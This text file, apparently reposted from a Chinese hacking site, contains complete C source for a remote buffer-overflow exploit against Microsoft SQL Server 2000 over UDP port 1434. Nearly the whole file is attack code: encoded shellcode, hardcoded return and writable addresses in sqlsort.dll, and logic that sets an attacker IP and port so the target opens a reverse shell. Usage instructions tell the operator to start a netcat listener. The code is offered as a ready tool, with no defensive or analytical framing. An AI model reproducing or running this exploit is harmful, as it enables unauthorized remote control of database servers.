sql攻击代码.txt

可以对黑客编程有一定的了解

/* 
MSSQL2000 Remote UDP Exploit! 

Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com 

fix a bug. 

Modified by lion, lion@cnhonker.net 
Welcome to HUC Website http://www.cnhonker.com 

*/ 


#include <stdio.h> 
#include <winsock2.h> 

#pragma comment (lib,"Ws2_32") 

int GainControlOfSQL(void); 
int StartWinsock(void); 

struct sockaddr_in c_sa; 
struct sockaddr_in s_sa; 

struct hostent *he; 
SOCKET sock; 
unsigned long addr; 
int SQLUDPPort=1434; 
char host[256]=""; 
char request[4000]="\x04"; 
char ping[8]="\x02"; 

char exploit_code[]= 
"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C" 
"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8" 
"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6" 
"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90" 
"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83" 
"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF" 
"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF" 
"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B" 
"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33" 
"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50" 
"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53" 
"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0" 
"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9" 
"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45" 
"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40" 
"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35" 
"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02" 
"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10" 
"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45" 
"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF" 
"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45" 
"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98" 
"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58" 
"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83" 
"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D" 
"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0" 
"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64" 
"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74" 
"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10" 
"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76" 
"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D" 
"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58" 
"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C" 
"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C" 
"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37" 
"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C" 
"\x58"; 


int main(int argc, char *argv[]) 
{ 
unsigned int ErrorLevel=0,len=0,c =0; 
int count = 0; 
char sc[300]=""; 
char ipaddress[40]=""; 
unsigned short port = 0; 
unsigned int ip = 0; 
char *ipt=""; 
char buffer[400]=""; 
unsigned short prt=0; 
char *prtt=""; 


if(argc != 2 && argc != 5) 
{ 
printf("===============================================================\r\n"); 
printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n"); 
printf("Modified from \"Advanced Windows Shellcode\"\r\n"); 
printf("Code by David Litchfield, david@ngssoftware.com\r\n"); 
printf("Modified by lion, fix a bug.\r\n"); 
printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n"); 
printf("Usage:\r\n"); 
printf("  %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]); 
printf("Exemple:\r\n"); 
printf("Target is MSSQL SP 0:\r\n"); 
printf("  C:\\>nc -l -p 53\r\n"); 
printf("  C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]); 
printf("Target is MSSQL SP 1 or 2:\r\n"); 
printf("  c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]); 
return 0; 
} 

strncpy(host, argv[1], 100); 

if(argc == 5) 
{ 
strncpy(ipaddress, argv[2], 36); 

port = atoi(argv[3]); 

// SQL Server 2000 Service pack level 
// The import entry for GetProcAddress in sqlsort.dll 
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C 
// Need to set the last byte accordingly 

if(argv[4][0] == 0x30) 
{ 
printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n"); 
exploit_code[9]=0x10; 
} 
else 
{ 
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n"); 
} 

} 

ErrorLevel = StartWinsock(); 
if(ErrorLevel==0) 
{ 
printf("Starting Winsock Error.\r\n"); 
return 0; 
} 

if(argc == 2) 
{ 
strcpy(request,ping); 

GainControlOfSQL(); 
return 0; 
} 


strcpy(buffer,exploit_code); 

// set this IP address to connect back to 
// this should be your address 
ip = inet_addr(ipaddress); 
ipt = (char*)&ip; 
buffer[142]=ipt[0]; 
buffer[143]=ipt[1]; 
buffer[144]=ipt[2]; 
buffer[145]=ipt[3]; 

// set the TCP port to connect on 
// netcat should be listening on this port 
// e.g. nc -l -p 80 

prt = htons(port); 
prt = prt ^ 0xFFFF; 
prtt = (char *) &prt; 
buffer[160]=prtt[0]; 
buffer[161]=prtt[1]; 

strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX"); 

// Overwrite the saved return address on the stack 
// This address contains a jmp esp instruction 
// and is in sqlsort.dll. 

strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC 

// Need to do a near jump 
strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46"); 

// Need to set an address which is writable or 
// sql server will crash before we can exploit 
// the overrun. Rather than choosing an address 
// on the stack which could be anywhere we'll 
// use an address in the .data segment of sqlsort.dll 
// as we're already using sqlsort for the saved 
// return address 

// SQL 2000 no service packs needs the address here 
strcat(request,"\x01\x70\xAE\x42"); 

// SQL 2000 Service Pack 2 needs the address here 
strcat(request,"\x01\x70\xAE\x42"); 

// just a few nops 
strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90"); 


// tack on exploit code to the end of our request and fire it off 
strcat(request,buffer); 

GainControlOfSQL(); 

return 0; 
} 


int StartWinsock() 
{ 
int err=0; 
WORD wVersionRequested; 
WSADATA wsaData; 

wVersionRequested = MAKEWORD(2,1); 
err = WSAStartup( wVersionRequested, &wsaData ); 
if (err != 0) 
{ 
printf("error WSAStartup 1.\r\n"); 
return 0; 
} 
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 ) 
{ 
printf("error WSAStartup 2.\r\n"); 
WSACleanup( ); 
return 0; 
} 

if (isalpha(host[0])) 
{ 
he = gethostbyname(host); 

if (he == NULL) 
{ 
printf("Can't get the ip of %s!\r\n", host); 
WSACleanup( ); 
exit(-1); 
} 

s_sa.sin_addr.s_addr=INADDR_ANY; 
s_sa.sin_family=AF_INET; 
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); 
} 
else 
{ 
s_sa.sin_family=AF_INET; 
s_sa.sin_addr.s_addr = inet_addr(host); 
} 

return 1; 
} 



int GainControlOfSQL(void) 
{ 
char resp[600]=""; 
int snd=0,rcv=0,count=0, var=0; 
unsigned int ttlbytes=0; 
unsigned int to=2000; 
struct sockaddr_in    cli_addr; 
SOCKET      cli_sock; 


cli_sock=socket(AF_INET,SOCK_DGRAM,0); 
if (cli_sock==INVALID_SOCKET) 
{ 
return printf("sock erron\r\n"); 
} 

cli_addr.sin_family=AF_INET; 
cli_addr.sin_addr.s_addr=INADDR_ANY; 
cli_addr.sin_port=htons((unsigned short)53); 

setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int)); 
if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR) 
{ 
return printf("bind error"); 
} 

s_sa.sin_port=htons((unsigned short)SQLUDPPort); 

if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) 
{ 
return printf("Connect error"); 
} 
else 
{ 
snd=send(cli_sock, request , strlen (request) , 0); 
printf("Packet sent!\r\n"); 
printf("If you don't have a shell it didn't work.\r\n"); 
rcv = recv(cli_sock,resp,596,0); 
if(rcv > 1) 
{ 
while(count < rcv) 
{ 
if(resp[count]==0x00) 
resp[count]=0x20; 
count++; 
} 
printf("%s",resp); 
} 
} 
closesocket(cli_sock); 

return 0; 
}